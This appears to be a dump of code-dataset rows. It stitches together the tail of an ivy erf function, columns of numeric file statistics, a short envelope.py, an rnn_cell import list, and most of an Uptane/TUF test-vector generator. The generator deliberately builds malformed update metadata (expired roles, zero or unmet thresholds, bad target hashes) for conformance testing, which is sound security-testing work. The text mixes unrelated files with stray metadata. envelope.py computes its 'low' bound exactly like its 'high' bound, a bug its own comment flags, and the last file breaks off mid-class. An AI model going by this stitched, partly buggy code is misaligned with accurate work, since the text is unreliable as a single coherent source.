        # ImportError is the precise exception for a missing optional
        # dependency; it is still caught by existing ``except Exception``
        # handlers, so this stays backward-compatible.
        raise ImportError(
            "scipy must be installed in order to call ivy.erf with a numpy backend."
        )
    return _erf(x, out=out)
| 27.643299
| 85
| 0.651898
| 2,101
| 13,407
| 4.013327
| 0.070919
| 0.220944
| 0.071158
| 0.113852
| 0.875949
| 0.868596
| 0.863259
| 0.863259
| 0.782021
| 0.737192
| 0
| 0.031131
| 0.199746
| 13,407
| 484
| 86
| 27.700413
| 0.754777
| 0.011561
| 0
| 0.609065
| 0
| 0
| 0.010345
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.172805
| false
| 0
| 0.016997
| 0.113314
| 0.385269
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 8
|
4c6bb7f9cfec52c9d9155f3fb6e1fce711858dcf
| 270
|
py
|
Python
|
envelope.py
|
snghojeong/balance-adviser
|
3c5811c62ff794575281ed2d060805fd157022b7
|
[
"MIT"
] | 1
|
2020-01-31T12:18:30.000Z
|
2020-01-31T12:18:30.000Z
|
envelope.py
|
snghojeong/balance-adviser
|
3c5811c62ff794575281ed2d060805fd157022b7
|
[
"MIT"
] | null | null | null |
envelope.py
|
snghojeong/balance-adviser
|
3c5811c62ff794575281ed2d060805fd157022b7
|
[
"MIT"
] | 1
|
2020-02-08T12:51:04.000Z
|
2020-02-08T12:51:04.000Z
|
def envelopeHiBounds(valueList, wnd):
    """Upper envelope: EWM mean of *valueList* scaled up by 2.5%."""
    hi_ratio = 0.025
    return envelopeBounds(valueList, wnd, hi_ratio)
def envelopeLoBounds(valueList, wnd):
    # NOTE(review): this is byte-identical to envelopeHiBounds — both pass
    # +0.025, so the "low" envelope equals the high one. Suspected
    # copy-paste bug; the low bound likely wants a negative ratio
    # (e.g. -0.025). Confirm intent before changing.
    return envelopeBounds(valueList, wnd, 0.025)
def envelopeBounds(valueList, wnd, ratio):
    """Exponentially-weighted mean of *valueList* (``ewm(wnd)``, i.e. com=wnd),
    scaled by ``(1 + ratio)``."""
    smoothed = valueList.ewm(wnd).mean()
    return smoothed * (1 + ratio)
| 30
| 50
| 0.737037
| 32
| 270
| 6.21875
| 0.40625
| 0.301508
| 0.39196
| 0.321608
| 0.512563
| 0.512563
| 0.512563
| 0.512563
| 0.512563
| 0
| 0
| 0.038793
| 0.140741
| 270
| 8
| 51
| 33.75
| 0.818966
| 0
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d5bec02a9804972ff143ecb35cc2f2b64820070e
| 178
|
py
|
Python
|
rnn_cell/__init__.py
|
h4ste/cantrip
|
33bce1378586f4c8c00315883e03296848109845
|
[
"MIT"
] | 2
|
2020-03-26T05:07:07.000Z
|
2020-06-19T13:27:57.000Z
|
rnn_cell/__init__.py
|
h4ste/cantrip
|
33bce1378586f4c8c00315883e03296848109845
|
[
"MIT"
] | null | null | null |
rnn_cell/__init__.py
|
h4ste/cantrip
|
33bce1378586f4c8c00315883e03296848109845
|
[
"MIT"
] | 3
|
2018-09-14T02:39:09.000Z
|
2021-02-22T22:28:32.000Z
|
from rnn_cell.ran_cell import RANCell, RANStateTuple
from rnn_cell.ran_cell import VHRANCell
from rnn_cell.gru_cell import LayerNormGRUCell
from rnn_cell.rhn_cell import RHNCell
| 35.6
| 52
| 0.876404
| 29
| 178
| 5.103448
| 0.413793
| 0.189189
| 0.297297
| 0.189189
| 0.324324
| 0.324324
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095506
| 178
| 4
| 53
| 44.5
| 0.919255
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
91108ce7879bd3803cbe8c116fe9207ac4dcb419
| 104,601
|
py
|
Python
|
tuf_vectors/uptane.py
|
xcheng-here/tuf-test-vectors
|
e7f42a23321376a51faac361f23b7f4a4a66092d
|
[
"MIT"
] | null | null | null |
tuf_vectors/uptane.py
|
xcheng-here/tuf-test-vectors
|
e7f42a23321376a51faac361f23b7f4a4a66092d
|
[
"MIT"
] | null | null | null |
tuf_vectors/uptane.py
|
xcheng-here/tuf-test-vectors
|
e7f42a23321376a51faac361f23b7f4a4a66092d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import re
from os import path
from tuf_vectors.metadata import Target, Delegation, Role, SKIPPED_DELEGATION_NAME
from tuf_vectors.step import Step, DEFAULT_TARGET_NAME, DEFAULT_TARGET_CONTENT, DEFAULT_DELEGATION_NAME, MISSING_DELEGATION_NAME
class Uptane:
    """Base class for an Uptane test vector: an ordered list of update
    steps, each a (director, image repo) pair of Step subclasses."""

    # Suffix stripped from subclass names when deriving the vector name.
    CLASS_SUFFIX = 'Uptane'

    '''2-tuple of (Director, Image Repo)'''
    STEPS = []

    def __init__(self, **kwargs) -> None:
        # Each vector writes its output under <output_dir>/<vector name>.
        output_dir = kwargs.get('output_dir', None)
        if output_dir is None:
            raise ValueError("Missing kwarg 'output_dir'")
        output_dir = path.join(output_dir, self.name())
        kwargs['output_dir'] = output_dir
        self.steps = []
        for idx, (director_step, image_step) in enumerate(self.STEPS):
            # Instantiate each step class with its repository role and
            # zero-based step index.
            args = kwargs.copy()
            args.update(step_index=idx)
            image_step = image_step(uptane_role='image_repo', **args)
            director_step = director_step(uptane_role='director', **args)
            self.steps.append((director_step, image_step))

    @classmethod
    def name(cls) -> str:
        # Derive a snake_case vector name from the class name, e.g.
        # "SimpleUptane" -> "simple".
        n = cls.__name__
        if n.endswith(cls.CLASS_SUFFIX):
            n = n[:-len(cls.CLASS_SUFFIX)]
            n = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', n)
            return re.sub('([a-z0-9])([A-Z])', r'\1_\2', n).lower()
        else:
            raise ValueError('Class name needs to end in "{}": {}'.format(cls.CLASS_SUFFIX, n))

    def persist(self) -> None:
        # Write every step's metadata to disk.
        for (director_step, image_step) in self.steps:
            director_step.persist()
            image_step.persist()

    def meta(self) -> dict:
        '''Used to indicate if this update should pass/fail'''
        meta = {'steps': []}
        for director_step, image_step in self.steps:
            meta['steps'].append({
                'director': director_step.meta(),
                'image_repo': image_step.meta(),
            })
        return meta
class SimpleUptane(Uptane):
    '''The most basic happy case for Uptane.'''
    # Key-pool convention used by all vectors below: the image repo uses
    # keys 0-3 (root/targets/snapshot/timestamp), the director keys 4+.

    class ImageStep(Step):
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }

    class DirectorStep(Step):
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]


class DirectorRootZeroThresholdUptane(Uptane):
    '''The director has a threshold of zero for the root role.'''
    # UPDATE_ERROR marks the client-side error this vector must trigger.

    class ImageStep(Step):
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }

    class DirectorStep(Step):
        TARGETS_KEYS_IDX = [5]
        UPDATE_ERROR = 'IllegalThreshold::Root'
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'root_threshold': 0,
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]


class DirectorTargetsZeroThresholdUptane(Uptane):
    '''The director has a threshold of zero for the targets role.'''

    class ImageStep(Step):
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }

    class DirectorStep(Step):
        TARGETS_KEYS_IDX = [5]
        UPDATE_ERROR = 'IllegalThreshold::Targets'
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_threshold': 0,
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]


class ImageRepoRootZeroThresholdUptane(Uptane):
    '''The image repo has a threshold of zero for the root role.'''

    class ImageStep(Step):
        UPDATE_ERROR = 'IllegalThreshold::Root'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
            'root_threshold': 0,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }

    class DirectorStep(Step):
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]


class ImageRepoTargetsZeroThresholdUptane(Uptane):
    '''The image repo has a threshold of zero for the targets role.'''

    class ImageStep(Step):
        UPDATE_ERROR = 'IllegalThreshold::Targets'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
            'targets_threshold': 0,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }

    class DirectorStep(Step):
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]


class ImageRepoSnapshotZeroThresholdUptane(Uptane):
    '''The image repo has a threshold of zero for the snapshot role.'''

    class ImageStep(Step):
        UPDATE_ERROR = 'IllegalThreshold::Snapshot'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
            'snapshot_threshold': 0,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }

    class DirectorStep(Step):
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]


class ImageRepoTimestampZeroThresholdUptane(Uptane):
    '''The image repo has a threshold of zero for the timestamp role.'''

    class ImageStep(Step):
        UPDATE_ERROR = 'IllegalThreshold::Timestamp'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
            'timestamp_threshold': 0,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }

    class DirectorStep(Step):
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]
class DirectorRootExpiredUptane(Uptane):
    '''The director has expired root metadata'''
    # 'is_expired': True poisons the named role's metadata; UPDATE_ERROR
    # is the client error each of these vectors must trigger.

    class ImageStep(Step):
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }

    class DirectorStep(Step):
        UPDATE_ERROR = 'ExpiredMetadata::Root'
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'is_expired': True,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]


class DirectorTargetsExpiredUptane(Uptane):
    '''The director has expired targets metadata'''

    class ImageStep(Step):
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }

    class DirectorStep(Step):
        UPDATE_ERROR = 'ExpiredMetadata::Targets'
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'is_expired': True,
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]


class ImageRepoRootExpiredUptane(Uptane):
    '''The image repo has expired root metadata'''

    class ImageStep(Step):
        UPDATE_ERROR = 'ExpiredMetadata::Root'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
            'is_expired': True,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }

    class DirectorStep(Step):
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]


class ImageRepoTargetsExpiredUptane(Uptane):
    '''The image repo has expired targets metadata'''

    class ImageStep(Step):
        UPDATE_ERROR = 'ExpiredMetadata::Targets'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'is_expired': True,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }

    class DirectorStep(Step):
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]


class ImageRepoSnapshotExpiredUptane(Uptane):
    '''The image repo has expired snapshot metadata'''

    class ImageStep(Step):
        UPDATE_ERROR = 'ExpiredMetadata::Snapshot'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'is_expired': True,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }

    class DirectorStep(Step):
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]


class ImageRepoTimestampExpiredUptane(Uptane):
    '''The image repo has expired timestamp metadata'''

    class ImageStep(Step):
        UPDATE_ERROR = 'ExpiredMetadata::Timestamp'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
            'is_expired': True,
        }

    class DirectorStep(Step):
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]
class DirectorTargetHashMismatchUptane(Uptane):
    '''The director has a target with bad hashes'''
    # TARGET_ERRORS maps the corrupted target name to the expected
    # per-target client error; the 'bad-hash' alteration produces the
    # mismatching hashes.

    class ImageStep(Step):
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }

    class DirectorStep(Step):
        TARGET_ERRORS = {
            DEFAULT_TARGET_NAME: 'TargetMismatch',
        }
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }

        # Factory for the step's target list; the 'bad-hash' alteration
        # makes the published hashes not match the content.
        def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
            return [Target(name=DEFAULT_TARGET_NAME,
                           content=DEFAULT_TARGET_CONTENT,
                           hardware_id=hardware_id,
                           ecu_identifier=ecu_identifier,
                           alteration='bad-hash')]

        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'targets': __targets,
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]


class ImageRepoTargetHashMismatchUptane(Uptane):
    '''The image repo has a target with bad hashes'''

    class ImageStep(Step):
        TARGET_ERRORS = {
            DEFAULT_TARGET_NAME: 'TargetMismatch',
        }
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }

        # Factory for the step's target list with deliberately bad hashes.
        def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
            return [Target(name=DEFAULT_TARGET_NAME,
                           content=DEFAULT_TARGET_CONTENT,
                           hardware_id=hardware_id,
                           ecu_identifier=ecu_identifier,
                           alteration='bad-hash')]

        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'targets': __targets,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }

    class DirectorStep(Step):
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]
class DirectorRootUnmetThresholdUptane(Uptane):
    '''The director root metadata has an unmet threshold'''
    # Pattern for the "unmet threshold" vectors: the role declares N keys
    # but only a subset signs (via *_sign_keys_idx or a [0:-1] slice).

    class ImageStep(Step):
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }

    class DirectorStep(Step):
        UPDATE_ERROR = 'UnmetThreshold::Root'
        TARGETS_KEYS_IDX = [6]
        ROOT_KWARGS = {
            'root_keys_idx': [4, 5],
            'root_sign_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]


class DirectorTargetsUnmetThresholdUptane(Uptane):
    '''The director targets metadata has an unmet threshold'''

    class ImageStep(Step):
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }

    class DirectorStep(Step):
        UPDATE_ERROR = 'UnmetThreshold::Targets'
        TARGETS_KEYS_IDX = [5, 6]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            # Sign with all but the last declared key -> threshold unmet.
            'targets_keys_idx': TARGETS_KEYS_IDX[0:-1],
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]


class ImageRepoRootUnmetThresholdUptane(Uptane):
    '''The image repo root metadata has an unmet threshold'''

    class ImageStep(Step):
        UPDATE_ERROR = 'UnmetThreshold::Root'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0, 6],
            'root_sign_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }

    class DirectorStep(Step):
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
